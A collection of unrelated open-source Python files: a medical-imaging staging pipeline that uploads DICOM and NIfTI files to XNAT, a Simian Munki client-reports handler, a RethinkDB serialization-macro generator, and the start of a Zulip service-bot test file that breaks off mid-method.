        :class:`qipipe.pipeline.staging.StagingWorkflow`.
        """

    def run(self, collection, subject, session, scan, volume, dest,
            *in_files):
        """
        Executes this volume staging workflow.

        :param collection: the collection name
        :param subject: the subject name
        :param session: the session name
        :param scan: the scan number
        :param volume: the volume number
        :param dest: the destination directory
        :param in_files: the input DICOM files
        :return: the output 3D NIfTI volume file path
        """
        # Set the top-level inputs.
        input_spec = self.workflow.get_node('input_spec')
        input_spec.inputs.collection = collection
        input_spec.inputs.subject = subject
        input_spec.inputs.session = session
        input_spec.inputs.scan = scan
        input_spec.inputs.volume = volume
        input_spec.inputs.dest = dest
        # Set the DICOM file iterator inputs.
        iter_dicom = self.workflow.get_node('iter_dicom')
        iter_dicom.iterables = ('dicom_file', in_files)
        # Execute the workflow.
        wf_res = self._run_workflow()
        # If dry_run is set, then there is no result.
        if not wf_res:
            return None
        # The magic incantation to get the Nipype workflow result.
        output_res = next(
            n for n in wf_res.nodes() if n.name == 'output_spec'
        )
        out_file = output_res.inputs.get()['out_file']
        self.logger.debug(
            "Executed the %s workflow on the %s %s scan %d with 3D"
            " volume result %s." %
            (self.workflow.name, subject, session, scan, out_file)
        )
        # Return the staged 3D volume files.
        return out_file

    def _create_workflow(self):
        """
        Makes the staging workflow described in
        :class:`qipipe.pipeline.staging.StagingWorkflow`.

        :return: the new workflow
        """
        # The Nipype workflow object.
        self.logger.debug('Building the volume staging workflow...')
        workflow = pe.Workflow(name='stage_volume', base_dir=self.base_dir)
        # The workflow input.
        in_fields = ['collection', 'subject', 'session', 'scan',
                     'volume', 'dest']
        input_spec = pe.Node(IdentityInterface(fields=in_fields),
                             name='input_spec')
        self.logger.debug("The %s workflow input node is %s with fields %s" %
                          (workflow.name, input_spec.name, in_fields))
        # The DICOM file iterator.
        iter_dicom = pe.Node(IdentityInterface(fields=['dicom_file']),
                             name='iter_dicom')
        self.logger.debug("The %s workflow DICOM iterable node is %s." %
                          (workflow.name, iter_dicom.name))
        # Fix the DICOM tags.
        fix_dicom = pe.Node(FixDicom(), name='fix_dicom')
        workflow.connect(input_spec, 'collection', fix_dicom, 'collection')
        workflow.connect(input_spec, 'subject', fix_dicom, 'subject')
        workflow.connect(iter_dicom, 'dicom_file', fix_dicom, 'in_file')
        # Compress the corrected DICOM files.
        compress_dicom = pe.Node(Compress(), name='compress_dicom')
        workflow.connect(fix_dicom, 'out_file', compress_dicom, 'in_file')
        workflow.connect(input_spec, 'dest', compress_dicom, 'dest')
        # The volume file name format, derived from the collection's
        # volume DICOM tag by the volume_format function.
        vol_fmt_xfc = Function(input_names=['collection'],
                               output_names=['format'],
                               function=volume_format)
        vol_fmt = pe.Node(vol_fmt_xfc, name='volume_format')
        workflow.connect(input_spec, 'collection', vol_fmt, 'collection')
        # Stack the scan slices into a 3D volume NIfTI file.
        stack_xfc = DcmStack(embed_meta=True)
        stack = pe.JoinNode(stack_xfc, joinsource='iter_dicom',
                            joinfield='dicom_files', name='stack')
        workflow.connect(fix_dicom, 'out_file', stack, 'dicom_files')
        workflow.connect(vol_fmt, 'format', stack, 'out_format')
        # The output is the 3D NIfTI stack file.
        output_flds = ['out_file']
        output_xfc = StickyIdentityInterface(fields=output_flds)
        output_spec = pe.Node(output_xfc, name='output_spec')
        workflow.connect(stack, 'out_file', output_spec, 'out_file')
        # Instrument the nodes for cluster submission, if necessary.
        self._configure_nodes(workflow)
        self.logger.debug("Created the %s workflow." % workflow.name)
        # If debug is set, then diagram the workflow graph.
        if self.logger.level <= logging.DEBUG:
            self.depict_workflow(workflow)
        return workflow
def stage_volume(collection, subject, session, scan, volume, in_files,
                 dest, opts):
    """
    Stages the given volume. The processed DICOM ``.dcm.gz`` files
    are placed in the *dest*/*volume* subdirectory. The child
    :class:`VolumeStagingWorkflow` runs in the
    _parent_/volume\ _volume_ directory, where:

    * _parent_ is the parent base directory specified in the
      options (default current directory)

    * _volume_ is the volume argument

    :param collection: the collection name
    :param subject: the subject name
    :param session: the session name
    :param scan: the scan number
    :param volume: the volume number
    :param in_files: the input DICOM files
    :param dest: the parent destination directory
    :param opts: the :class:`VolumeStagingWorkflow` initializer
        options
    :return: the 3D NIfTI volume file
    """
    # This function executes as a Nipype Function interface, so the
    # imports must be local. (The former unused 'import shutil' was
    # removed.)
    import os
    from qipipe.helpers.logging import logger
    from qipipe.pipeline.staging import VolumeStagingWorkflow

    _logger = logger(__name__)
    # The volume destination is a dest subdirectory.
    dest = os.path.abspath(dest)
    out_dir = "%s/volume%03d" % (dest, volume)
    os.mkdir(out_dir)
    # The volume workflow runs in a subdirectory.
    parent_dir = opts.pop('base_dir', os.getcwd())
    base_dir = "%s/volume%03d" % (parent_dir, volume)
    # Make the workflow.
    stg_wf = VolumeStagingWorkflow(base_dir=base_dir, **opts)
    # Execute the workflow. (Consistency fix: reuse the _logger created
    # above instead of calling logger(__name__) again.)
    _logger.debug("Staging %s %s scan %d volume %d in %s..." %
                  (subject, session, scan, volume, out_dir))
    out_file = stg_wf.run(collection, subject, session, scan, volume,
                          out_dir, *in_files)
    _logger.debug("Staged %s %s scan %d volume %d in %s." %
                  (subject, session, scan, volume, out_dir))
    return out_file
def _upload(project, subject, session, scan, dcm_dir, volume_files,
            time_series=None):
    """
    Uploads the staged files.

    :param project: the project name
    :param subject: the subject name
    :param session: the session name
    :param scan: the scan number
    :param dcm_dir: the input staged directory
    :param volume_files: the 3D scan volume files
    :param time_series: the 4D scan time series file, if the scan is
        multi-volume
    """
    # Executed as a Nipype Function interface, hence the local import.
    from qipipe.pipeline.staging import (upload_dicom, upload_nifti)

    # Delegate the DICOM upload to the public function.
    upload_dicom(project, subject, session, scan, dcm_dir)
    # The NIfTI upload includes the 4D time series when present.
    nii_files = list(volume_files)
    if time_series:
        nii_files.append(time_series)
    upload_nifti(project, subject, session, scan, nii_files)
def upload_dicom(project, subject, session, scan, dcm_dir):
    """
    Uploads the staged ``.dcm.gz`` files in *dcm_dir* to the
    XNAT scan ``DICOM`` resource

    :param project: the project name
    :param subject: the subject name
    :param session: the session name
    :param scan: the scan number
    :param dcm_dir: the input staged directory
    """
    _logger = logger(__name__)
    # Locate the staged volume subdirectories.
    vol_dir_pat = "%s/volume*" % dcm_dir
    vol_dirs = glob.glob(vol_dir_pat)
    if not vol_dirs:
        raise PipelineError("The input directory does not contain any"
                            " DICOM directories matching %s" % vol_dir_pat)
    _logger.debug("Uploading %d %s %s scan %d volumes to XNAT..." %
                  (len(vol_dirs), subject, session, scan))
    # Upload one volume directory at a time, since pyxnat upload
    # takes up a big chunk of memory, perhaps due to a memory leak.
    dcm_file_cnt = 0
    for vol_dir in vol_dirs:
        # The DICOM files to upload.
        dcm_file_pat = "%s/*.dcm.gz" % vol_dir
        dcm_files = glob.glob(dcm_file_pat)
        if not dcm_files:
            raise PipelineError(
                "The input DICOM volume directory %s does not contain scan"
                " DICOM files matching %s" % (vol_dir, dcm_file_pat)
            )
        # Parse the volume number out of the directory base name.
        vol_dir_base_name = os.path.basename(vol_dir)
        vol_nbr_match = VOLUME_DIR_PAT.match(vol_dir_base_name)
        vol_nbr = int(vol_nbr_match.group('volume_number'))
        _logger.debug(
            "Uploading %d %s %s scan %d volume %s DICOM files to XNAT..." %
            (len(dcm_files), subject, session, scan, vol_nbr)
        )
        # A fresh connection per volume keeps the memory footprint down.
        with qixnat.connect() as xnat:
            # The target XNAT scan DICOM resource object.
            # The modality option is required if it is necessary to
            # create the XNAT scan object.
            rsc = xnat.find_or_create(
                project, subject, session, scan=scan, resource='DICOM',
                modality='MR'
            )
            xnat.upload(rsc, *dcm_files)
        dcm_file_cnt += len(dcm_files)
    _logger.debug("Uploaded %d %s %s scan %d staged DICOM files to"
                  " XNAT." % (dcm_file_cnt, subject, session, scan))
def upload_nifti(project, subject, session, scan, files):
    """
    Uploads the staged NIfTI files to the XNAT scan ``NIFTI``
    resource.

    :param project: the project name
    :param subject: the subject name
    :param session: the session name
    :param scan: the scan number
    :param files: the NIfTI files to upload
    """
    _logger = logger(__name__)
    file_cnt = len(files)
    _logger.debug("Uploading %d %s %s scan %d staged NIfTI files to"
                  " XNAT..." % (file_cnt, subject, session, scan))
    # All NIfTI files go up in a single XNAT action.
    with qixnat.connect() as xnat:
        # The target XNAT scan NIFTI resource object.
        nifti_rsc = xnat.find_or_create(
            project, subject, session, scan=scan, resource='NIFTI'
        )
        xnat.upload(nifti_rsc, *files)
    _logger.debug("Uploaded %d %s %s scan %d staged NIfTI files to"
                  " XNAT." % (file_cnt, subject, session, scan))
def volume_format(collection):
    """
    The DcmStack format for making a file name from the DICOM
    volume tag.

    Example::

        >>> volume_format('Sarcoma')
        "volume%(AcquisitionNumber)03d"

    :param collection: the collection name
    :return: the volume file name format
    """
    # Executed as a Nipype Function interface, hence the local import.
    from qipipe.staging import image_collection

    tag = image_collection.with_name(collection).patterns.volume
    # Escape the leading % and inject the DICOM tag.
    return "volume%%(%s)03d" % tag
|
|
#!/usr/bin/env python
#
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Reports URL handlers."""
import datetime
import json
import logging
import os
import re
import urllib
from simian.auth import gaeserver
from simian.mac import common as main_common
from simian.mac import models
from simian.mac.common import gae_util
from simian.mac.common import util
from simian.mac.munki import common
from simian.mac.munki import handlers
# int number of days after which postflight_datetime is considered stale.
FORCE_CONTINUE_POSTFLIGHT_DAYS = 5
# int number of failed Munki executions before instructing the client to repair.
REPAIR_CLIENT_PREFLIGHT_COUNT_SINCE_POSTFLIGHT = 5
# Result markers embedded in legacy Munki install-result strings.
INSTALL_RESULT_FAILED = 'FAILED with return code'
INSTALL_RESULT_SUCCESSFUL = 'SUCCESSFUL'
# Prefix prepended to JSON feedback responses (see Reports.post).
JSON_PREFIX = ')]}\',\n'
# Parses e.g. "Install of FooPkg-1.0: SUCCESSFUL" or
# "Install of FooPkg-1.0: FAILED with return code: -1".
# Groups: (1) name, (2) version, (3) result text, (4) optional return code.
LEGACY_INSTALL_RESULTS_STRING_REGEX = re.compile(
    r'^Install of (.*)-(\d+.*): (%s|%s: (\-?\d+))$' % (
        INSTALL_RESULT_SUCCESSFUL, INSTALL_RESULT_FAILED))
# Example: 'iLife 11: Download failed (Error -1001: The request timed out.)'
DOWNLOAD_FAILED_STRING_REGEX = re.compile(
    r'([\s\w\.\-]+): Download failed \((.*)\)')
# For legacy clients that do not support multiple feedback commands via JSON,
# this list is used to determine which single command to send, if any, in
# increasing importance order.
LEGACY_FEEDBACK_LIST = ['EXIT', 'FORCE_CONTINUE', 'REPAIR', 'UPLOAD_LOGS']
def IsExitFeedbackIpAddress(ip_address):
  """Is this an IP address that should result in an exit feedback?

  Args:
    ip_address: str, like "1.2.3.4"
  Returns:
    True if this IP address should result in exit feedback
  """
  if not ip_address:
    # Preserve the original short-circuit result for empty/None input.
    return ip_address
  return models.KeyValueCache.IpInList('client_exit_ip_blocks', ip_address)
class Reports(handlers.AuthenticationHandler):
  """Handler for /reports/.

  Munki clients POST execution reports here: preflight/postflight
  check-ins, install results, broken-client notices, and MSU log events.
  Preflight posts also receive feedback commands in the response body.
  """
  def GetReportFeedback(self, uuid, report_type, **kwargs):
    """Inspect a report and provide a feedback status/command.

    Args:
      uuid: str, computer uuid
      report_type: str, report type
      **kwargs: dict, additional report parameters, e.g:
          on_corp: str, optional, '1' or '0', on_corp status
          message: str, optional, message from client
          details: str, optional, details from client
          ip_address: str, optional, IP address of client
    Returns:
      dict of feedback commands for the client keyed by command name,
      e.g. {'force_continue': True}.
    """
    feedback = {}
    # Reuse a Computer entity supplied by the caller to avoid a second fetch.
    if 'computer' in kwargs:
      c = kwargs['computer']
    else:
      c = models.Computer.get_by_key_name(uuid)
    ip_address = kwargs.get('ip_address', None)
    client_exit = kwargs.get('client_exit', None)
    if client_exit and report_type == 'preflight':
      # client has requested an exit, but let's ensure we should allow it.
      if c is None or c.postflight_datetime is None:
        # client has never fully executed Munki.
        feedback['force_continue'] = True
      else:
        # check if the postflight_datetime warrants a FORCE_CONTINUE
        now = datetime.datetime.utcnow()
        postflight_stale_datetime = now - datetime.timedelta(
            days=FORCE_CONTINUE_POSTFLIGHT_DAYS)
        if c.postflight_datetime < postflight_stale_datetime:
          # client hasn't executed Munki in FORCE_CONTINUE_POSTFLIGHT_DAYS.
          feedback['force_continue'] = True
        else:
          feedback['exit'] = True
    elif report_type == 'preflight':
      if IsExitFeedbackIpAddress(ip_address):
        feedback['exit'] = True
      elif common.IsPanicModeNoPackages():
        feedback['exit'] = True
      elif not c or c.preflight_datetime is None:
        # this is the first preflight post from this client.
        feedback['force_continue'] = True
      elif getattr(c, 'upload_logs_and_notify', None) is not None:
        # an admin has requested logs from this client.
        feedback['logging_level'] = 3
        feedback['upload_logs'] = True
      else:
        # check if preflight_count_since_postflight warrants a repair.
        if (c.preflight_count_since_postflight >=
            REPAIR_CLIENT_PREFLIGHT_COUNT_SINCE_POSTFLIGHT):
          feedback['pkill_installd'] = True
          feedback['pkill_softwareupdated'] = True
          feedback['repair'] = True
          feedback['logging_level'] = 3
          feedback['upload_logs'] = True
    return feedback
  def _LogInstalls(self, installs, computer):
    """Logs a batch of installs for a given computer.

    Args:
      installs: list, of str install data from a preflight/postflight report.
      computer: models.Computer entity.
    """
    if not installs:
      return
    # Tri-state corp-network flag: True/False when reported, else None.
    on_corp = self.request.get('on_corp')
    if on_corp == '1':
      on_corp = True
    elif on_corp == '0':
      on_corp = False
    else:
      on_corp = None
    to_put = []
    for install in installs:
      if install.startswith('Install of'):
        # defaults for fields the legacy string format cannot express.
        d = {
            'applesus': 'false',
            'duration_seconds': None,
            'download_kbytes_per_sec': None,
            'name': install,
            'status': 'UNKNOWN',
            'version': '',
            'unattended': 'false',
        }
        # support for old 'Install of FooPkg-1.0: SUCCESSFUL' style strings.
        try:
          m = LEGACY_INSTALL_RESULTS_STRING_REGEX.search(install)
          if not m:
            raise ValueError
          elif m.group(3) == INSTALL_RESULT_SUCCESSFUL:
            d['status'] = 0
          else:
            d['status'] = m.group(4)
          d['name'] = m.group(1)
          d['version'] = m.group(2)
        except (IndexError, AttributeError, ValueError):
          logging.warning('Unknown install string format: %s', install)
      else:
        # support for new 'name=pkg|version=foo|...' style strings.
        d = common.KeyValueStringToDict(install)
      name = d.get('display_name', '') or d.get('name', '')
      version = d.get('version', '')
      # str() normalizes the legacy int 0 success status set above.
      status = str(d.get('status', ''))
      applesus = common.GetBoolValueFromString(d.get('applesus', '0'))
      unattended = common.GetBoolValueFromString(d.get('unattended', '0'))
      try:
        duration_seconds = int(d.get('duration_seconds', None))
      except (TypeError, ValueError):
        duration_seconds = None
      try:
        dl_kbytes_per_sec = int(d.get('download_kbytes_per_sec', None))
        # Ignore zero KB/s download speeds, as that's how Munki reports
        # unknown speed.
        if dl_kbytes_per_sec == 0:
          dl_kbytes_per_sec = None
      except (TypeError, ValueError):
        dl_kbytes_per_sec = None
      try:
        install_datetime = util.Datetime.utcfromtimestamp(d.get('time', None))
      except ValueError as e:
        logging.info('Ignoring invalid install_datetime: %s', str(e))
        install_datetime = datetime.datetime.utcnow()
      except util.EpochExtremeFutureValueError as e:
        logging.info('Ignoring extreme future install_datetime: %s', str(e))
        install_datetime = datetime.datetime.utcnow()
      except util.EpochFutureValueError:
        install_datetime = datetime.datetime.utcnow()
      pkg = '%s-%s' % (name, version)
      entity = models.InstallLog(
          uuid=computer.uuid, computer=computer, package=pkg, status=status,
          on_corp=on_corp, applesus=applesus, unattended=unattended,
          duration_seconds=duration_seconds, mtime=install_datetime,
          dl_kbytes_per_sec=dl_kbytes_per_sec)
      entity.success = entity.IsSuccess()
      to_put.append(entity)
    # Write all InstallLog entities in batched datastore operations.
    gae_util.BatchDatastoreOp(models.db.put, to_put)
  def post(self):
    """Reports POST handler.

    Dispatches on the '_report_type' form parameter and persists the
    report; preflight posts also receive feedback in the response body.

    Returns:
      A webapp.Response() response.
    """
    session = gaeserver.DoMunkiAuth()
    uuid = main_common.SanitizeUUID(session.uuid)
    report_type = self.request.get('_report_type')
    report_feedback = {}
    message = None
    details = None
    client_id = None
    computer = None
    if report_type == 'preflight' or report_type == 'postflight':
      client_id_str = urllib.unquote(self.request.get('client_id'))
      client_id = common.ParseClientId(client_id_str, uuid=uuid)
      user_settings_str = self.request.get('user_settings')
      user_settings = None
      try:
        if user_settings_str:
          user_settings = util.Deserialize(
              urllib.unquote(str(user_settings_str)))
      except util.DeserializeError:
        # best-effort: malformed settings are logged, not fatal.
        logging.warning(
            'Client %s sent broken user_settings: %s',
            client_id_str, user_settings_str)
      pkgs_to_install = self.request.get_all('pkgs_to_install')
      apple_updates_to_install = self.request.get_all(
          'apple_updates_to_install')
      computer = models.Computer.get_by_key_name(uuid)
      ip_address = os.environ.get('REMOTE_ADDR', '')
      if report_type == 'preflight':
        # we want to get feedback now, before preflight_datetime changes.
        client_exit = self.request.get('client_exit', None)
        report_feedback = self.GetReportFeedback(
            uuid, report_type, computer=computer, ip_address=ip_address,
            client_exit=client_exit)
        if self.request.get('json') == '1':
          self.response.out.write(JSON_PREFIX + json.dumps(report_feedback))
        else:
          # For legacy clients that accept a single string, not JSON.
          feedback_to_send = 'OK'
          for feedback in LEGACY_FEEDBACK_LIST:
            if report_feedback.get(feedback.lower()):
              feedback_to_send = feedback
          self.response.out.write(feedback_to_send)
        # if report feedback calls for a client exit, log it.
        if report_feedback.get('exit'):
          if not client_exit:
            # client didn't ask for an exit, which means server decided.
            client_exit = 'Connection from defined exit IP address'
          common.WriteClientLog(
              models.PreflightExitLog, uuid, computer=computer,
              exit_reason=client_exit)
      cert_fingerprint = None
      common.LogClientConnection(
          report_type, client_id, user_settings, pkgs_to_install,
          apple_updates_to_install, computer=computer, ip_address=ip_address,
          report_feedback=report_feedback, cert_fingerprint=cert_fingerprint)
    elif report_type == 'install_report':
      computer = models.Computer.get_by_key_name(uuid)
      self._LogInstalls(self.request.get_all('installs'), computer)
      for removal in self.request.get_all('removals'):
        common.WriteClientLog(
            models.ClientLog, uuid, computer=computer, action='removal',
            details=removal)
      for problem in self.request.get_all('problem_installs'):
        common.WriteClientLog(
            models.ClientLog, uuid, computer=computer,
            action='install_problem', details=problem)
    elif report_type == 'broken_client':
      # Default reason of "objc" to support legacy clients, existing when objc
      # was the only broken state ever reported.
      reason = self.request.get('reason', 'objc')
      details = self.request.get('details')
      logging.warning('Broken Munki client (%s): %s', reason, details)
      common.WriteBrokenClient(uuid, reason, details)
    elif report_type == 'msu_log':
      details = {}
      for k in ['time', 'user', 'source', 'event', 'desc']:
        details[k] = self.request.get(k, None)
      common.WriteComputerMSULog(uuid, details)
    else:
      # unknown report type; log all post params.
      params = []
      for param in self.request.arguments():
        params.append('%s=%s' % (param, self.request.get_all(param)))
      common.WriteClientLog(
          models.ClientLog, uuid, action='unknown', details=str(params))
|
|
#!/usr/bin/env python
# Copyright 2010-2014 RethinkDB, all rights reserved.
import sys
"""This script is used to generate the RDB_MAKE_SERIALIZABLE_*() and
RDB_MAKE_ME_SERIALIZABLE_*() macro definitions. Because there are so
many variations, and because they are so similar, it's easier to just
have a Python script to generate them.
This script is meant to be run as follows (assuming you are in the
top directory):
$ ./scripts/generate_serialize_macros.py > src/rpc/serialize_macros.hpp
"""
def generate_make_serializable_macro(nfields):
    """Print the serialization macro family for a given field count.

    Emits to stdout: RDB_MAKE_SERIALIZABLE_<n> and its _FOR_CLUSTER
    variant, the RDB_IMPL_SERIALIZABLE_<n>[_FOR_CLUSTER|_SINCE_*]
    wrappers, and RDB_MAKE_ME_SERIALIZABLE_<n> (the in-class friend
    variant).
    """
    # ", field1, field2, ..." tail for the macro parameter lists.
    fields = "".join(", field%d" % (i + 1) for i in xrange(nfields))
    # With zero fields the (de)serializer parameters go unused.
    zeroarg = ("UNUSED " if nfields == 0 else "")
    # RDB_MAKE_SERIALIZABLE_<n>: templated on cluster_version_t.
    print "#define RDB_MAKE_SERIALIZABLE_%d(type_t%s) \\" % \
        (nfields, fields)
    print " template <cluster_version_t W> \\"
    print " void serialize(%swrite_message_t *wm, %sconst type_t &thing) { \\" % (zeroarg, zeroarg)
    for i in xrange(nfields):
        print " serialize<W>(wm, thing.field%d); \\" % (i + 1)
    print " } \\"
    print " template <cluster_version_t W> \\"
    print " archive_result_t deserialize(%sread_stream_t *s, %stype_t *thing) { \\" % (zeroarg, zeroarg)
    print " archive_result_t res = archive_result_t::SUCCESS; \\"
    for i in xrange(nfields):
        print " res = deserialize<W>(s, deserialize_deref(thing->field%d)); \\" % (i + 1)
        print " if (bad(res)) { return res; } \\"
    print " return res; \\"
    print " } \\"
    print " extern int dont_use_RDB_MAKE_SERIALIZABLE_within_a_class_body"
    print
    # _FOR_CLUSTER: explicit specializations for cluster_version_t::CLUSTER.
    print "#define RDB_MAKE_SERIALIZABLE_%d_FOR_CLUSTER(type_t%s) \\" % \
        (nfields, fields)
    print " template <> \\"
    print " void serialize<cluster_version_t::CLUSTER>( \\"
    print " %swrite_message_t *wm, %sconst type_t &thing) { \\" % (zeroarg, zeroarg)
    for i in xrange(nfields):
        print " serialize<cluster_version_t::CLUSTER>(wm, thing.field%d); \\" % (i + 1)
    print " } \\"
    print " template <> \\"
    print " archive_result_t deserialize<cluster_version_t::CLUSTER>( \\"
    print " %sread_stream_t *s, %stype_t *thing) { \\" % (zeroarg, zeroarg)
    print " archive_result_t res = archive_result_t::SUCCESS; \\"
    for i in xrange(nfields):
        print " res = deserialize<cluster_version_t::CLUSTER>( \\"
        print " s, deserialize_deref(thing->field%d)); \\" % (i + 1)
        print " if (bad(res)) { return res; } \\"
    print " return res; \\"
    print " } \\"
    print " extern int dont_use_RDB_MAKE_SERIALIZABLE_FOR_CLUSTER_within_a_class_body"
    print
    # See the note in the comment below.
    print "#define RDB_IMPL_SERIALIZABLE_%d(type_t%s) RDB_MAKE_SERIALIZABLE_%d(type_t%s); \\" % (nfields, fields, nfields, fields)
    print
    print "#define RDB_IMPL_SERIALIZABLE_%d_FOR_CLUSTER(type_t%s) \\" % (nfields, fields)
    print " RDB_MAKE_SERIALIZABLE_%d_FOR_CLUSTER(type_t%s);" % (nfields, fields)
    print
    # _SINCE_* wrappers: implementation plus INSTANTIATE_* for a version.
    print "#define RDB_IMPL_SERIALIZABLE_%d_SINCE_v1_13(type_t%s) \\" % (nfields, fields)
    print " RDB_IMPL_SERIALIZABLE_%d(type_t%s); \\" % (nfields, fields)
    print " INSTANTIATE_SERIALIZABLE_SINCE_v1_13(type_t)"
    print
    print "#define RDB_IMPL_SERIALIZABLE_%d_SINCE_v1_16(type_t%s) \\" % (nfields, fields)
    print " RDB_IMPL_SERIALIZABLE_%d(type_t%s); \\" % (nfields, fields)
    print " INSTANTIATE_SERIALIZABLE_SINCE_v1_16(type_t)"
    print
    print "#define RDB_IMPL_SERIALIZABLE_%d_SINCE_v2_1(type_t%s) \\" % (nfields, fields)
    print " RDB_IMPL_SERIALIZABLE_%d(type_t%s); \\" % (nfields, fields)
    print " INSTANTIATE_SERIALIZABLE_SINCE_v2_1(type_t)"
    print
    print "#define RDB_IMPL_SERIALIZABLE_%d_SINCE_v2_2(type_t%s) \\" % (nfields, fields)
    print " RDB_IMPL_SERIALIZABLE_%d(type_t%s); \\" % (nfields, fields)
    print " INSTANTIATE_SERIALIZABLE_SINCE_v2_2(type_t)"
    print
    print "#define RDB_IMPL_SERIALIZABLE_%d_SINCE_v2_3(type_t%s) \\" % (nfields, fields)
    print " RDB_IMPL_SERIALIZABLE_%d(type_t%s); \\" % (nfields, fields)
    print " INSTANTIATE_SERIALIZABLE_SINCE_v2_3(type_t)"
    print
    print "#define RDB_IMPL_SERIALIZABLE_%d_SINCE_v2_4(type_t%s) \\" % (nfields, fields)
    print " RDB_IMPL_SERIALIZABLE_%d(type_t%s); \\" % (nfields, fields)
    print " INSTANTIATE_SERIALIZABLE_SINCE_v2_4(type_t)"
    print
    print "#define RDB_IMPL_SERIALIZABLE_%d_SINCE_v2_5(type_t%s) \\" % (nfields, fields)
    print " RDB_IMPL_SERIALIZABLE_%d(type_t%s); \\" % (nfields, fields)
    print " INSTANTIATE_SERIALIZABLE_SINCE_v2_5(type_t)"
    # RDB_MAKE_ME_SERIALIZABLE_<n>: friend functions for use in a class body.
    print "#define RDB_MAKE_ME_SERIALIZABLE_%d(type_t%s) \\" % \
        (nfields, fields)
    print " template <cluster_version_t W> \\"
    print " friend void serialize(%swrite_message_t *wm, %sconst type_t &thing) { \\" % (zeroarg, zeroarg)
    for i in xrange(nfields):
        print " serialize<W>(wm, thing.field%d); \\" % (i + 1)
    print " } \\"
    print " template <cluster_version_t W> \\"
    print " friend archive_result_t deserialize(%sread_stream_t *s, %stype_t *thing) { \\" % (zeroarg, zeroarg)
    print " archive_result_t res = archive_result_t::SUCCESS; \\"
    for i in xrange(nfields):
        print " res = deserialize<W>(s, deserialize_deref(thing->field%d)); \\" % (i + 1)
        print " if (bad(res)) { return res; } \\"
    print " return res; \\"
    print " }"
if __name__ == "__main__":
    # Emit the complete generated header to stdout; the caller redirects
    # it into src/rpc/serialize_macros.hpp.
    print "// Copyright 2010-2014 RethinkDB, all rights reserved."
    print "#ifndef RPC_SERIALIZE_MACROS_HPP_"
    print "#define RPC_SERIALIZE_MACROS_HPP_"
    print
    print "/* This file is automatically generated by '%s'." % " ".join(sys.argv)
    print "Please modify '%s' instead of modifying this file.*/" % sys.argv[0]
    print
    print "#include <type_traits>"
    print
    print "#include \"containers/archive/archive.hpp\""
    print "#include \"containers/archive/versioned.hpp\""
    print "#include \"errors.hpp\""
    print "#include \"version.hpp\""
    print
    print """
/* The purpose of these macros is to make it easier to serialize and
unserialize data types that consist of a simple series of fields, each
of which is serializable. Suppose we have a type "struct point_t {
int32_t x, y; }" that we want to be able to serialize. To make it
serializable automatically, either write
RDB_MAKE_SERIALIZABLE_2(point_t, x, y) at the global scope, or write
RDB_MAKE_ME_SERIALIZABLE_2(point_t, x, y) within the body of the
point_t type.
The _FOR_CLUSTER variants of the macros exist to indicate that a type
can only be serialized for use within the cluster, thus should not be
serialized to disk.
The _SINCE_v1_13 variants of the macros exist to make the conversion to
versioned serialization easier. They must only be used for types which
serialization format has not changed since version 1.13.0.
Once the format changes, you can still use the macros without
the _SINCE_v1_13 suffix and instantiate the serialize() and deserialize()
functions explicitly for a certain version.
We use dummy "extern int" declarations to force a compile error in
macros that should not be used inside of class bodies. */
""".strip()
    print "namespace helper {"
    print
    print "/* When a `static_assert` is used within a templated class or function,"
    print " * but does not depend on any template parameters the C++ compiler is free"
    print " * to evaluate the assert even before instantiating that template. This"
    print " * helper class allows a `static_assert(false, ...)` to depend on the"
    print " * `cluster_version_t` template parameter."
    print " * Also see http://stackoverflow.com/a/14637534. */"
    print "template <cluster_version_t W>"
    print "struct always_false"
    print "    : std::false_type { };"
    print
    print "} // namespace helper"
    print
    print "#define RDB_DECLARE_SERIALIZABLE(type_t) \\"
    print " template <cluster_version_t W> \\"
    print " void serialize(write_message_t *, const type_t &); \\"
    print " template <cluster_version_t W> \\"
    print " archive_result_t deserialize(read_stream_t *s, type_t *thing); \\"
    print " extern int dont_use_RDB_DECLARE_SERIALIZABLE_within_a_class_body"
    print
    print "#define RDB_DECLARE_SERIALIZABLE_FOR_CLUSTER(type_t) \\"
    print " template <cluster_version_t W> \\"
    print " void serialize(write_message_t *, const type_t &) { \\"
    print " static_assert(helper::always_false<W>::value, \\"
    print " \"This type is only serializable for cluster.\"); \\"
    print " unreachable(); \\"
    print " } \\"
    print " template <> \\"
    print " void serialize<cluster_version_t::CLUSTER>( \\"
    print " write_message_t *, const type_t &); \\"
    print " template <cluster_version_t W> \\"
    print " archive_result_t deserialize(read_stream_t *, type_t *) { \\"
    print " static_assert(helper::always_false<W>::value, \\"
    print " \"This type is only deserializable for cluster.\"); \\"
    print " unreachable(); \\"
    print " } \\"
    print " template <> \\"
    print " archive_result_t deserialize<cluster_version_t::CLUSTER>( \\"
    print " read_stream_t *s, type_t *thing)"
    print
    print "#define RDB_DECLARE_ME_SERIALIZABLE(type_t) \\"
    print " template <cluster_version_t W> \\"
    print " friend void serialize(write_message_t *, const type_t &); \\"
    print " template <cluster_version_t W> \\"
    print " friend archive_result_t deserialize(read_stream_t *s, type_t *thing)"
    # One macro family per supported field count.
    for nfields in xrange(20):
        generate_make_serializable_macro(nfields)
        print
    print "#endif // RPC_SERIALIZE_MACROS_HPP_"
|
|
# -*- coding: utf-8 -*-
import mock
from typing import Any, Union, Mapping, Callable
from zerver.lib.actions import (
do_create_user,
get_service_bot_events,
)
from zerver.lib.test_classes import ZulipTestCase
from zerver.models import (
get_realm,
UserProfile,
Recipient,
)
# Maps each service bot type to the queue its trigger events are
# published on via queue_json_publish.
BOT_TYPE_TO_QUEUE_NAME = {
    UserProfile.OUTGOING_WEBHOOK_BOT: 'outgoing_webhooks',
    UserProfile.EMBEDDED_BOT: 'embedded_bots',
}
class TestServiceBotBasics(ZulipTestCase):
    """Unit tests for get_service_bot_events()."""

    def _get_outgoing_bot(self):
        # type: () -> UserProfile
        """Create an outgoing-webhook bot owned by Cordelia."""
        return do_create_user(
            email="bar-bot@zulip.com",
            password="test",
            realm=get_realm("zulip"),
            full_name="BarBot",
            short_name='bb',
            bot_type=UserProfile.OUTGOING_WEBHOOK_BOT,
            bot_owner=self.example_user('cordelia'),
        )

    def test_service_events_for_pms(self):
        # type: () -> None
